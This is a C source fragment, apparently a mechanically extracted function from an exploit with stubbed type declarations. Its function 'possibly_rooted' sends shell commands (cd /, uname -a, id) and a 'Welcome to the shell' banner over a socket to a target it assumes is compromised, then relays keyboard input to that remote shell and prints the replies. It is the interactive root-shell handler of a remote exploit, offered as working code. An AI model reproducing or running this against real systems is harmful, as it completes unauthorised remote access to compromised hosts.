
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buf ;


 int EXIT_SUCCESS ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int close (int) ;
 int exit (int ) ;
 int fileno (int ) ;
 int memset (char*,int,int) ;
 int printf (char*,...) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int stdin ;
 int strlen (char*) ;
 int write (int,char*,int ) ;

void possibly_rooted(int sock)
{
    char banner[] =
 "cd /; echo; uname -a; echo; id; echo; echo Welcome to the shell, "
 "enter commands at will; echo;\n\n";

    char buf[1024];
    fd_set fds;
    int r;

    write(sock, banner, strlen(banner));

    for(;;)
    {
        FD_ZERO(&fds);
        FD_SET(fileno(stdin), &fds);
        FD_SET(sock, &fds);
        select(255, &fds, ((void*)0), ((void*)0), ((void*)0));

        if(FD_ISSET(sock, &fds))
        {
            memset(buf, 0x0, sizeof(buf));
            r = read (sock, buf, sizeof(buf) - 1);
            if(r <= 0)
            {
                printf("Connection closed.\n");
                exit(EXIT_SUCCESS);
            }
            printf("%s", buf);
        }

        if(FD_ISSET(fileno(stdin), &fds))
        {
            memset(buf, 0x0, sizeof(buf));
            read(fileno(stdin), buf, sizeof(buf) - 1);
            write(sock, buf, strlen(buf));
        }
    }
    close(sock);
}
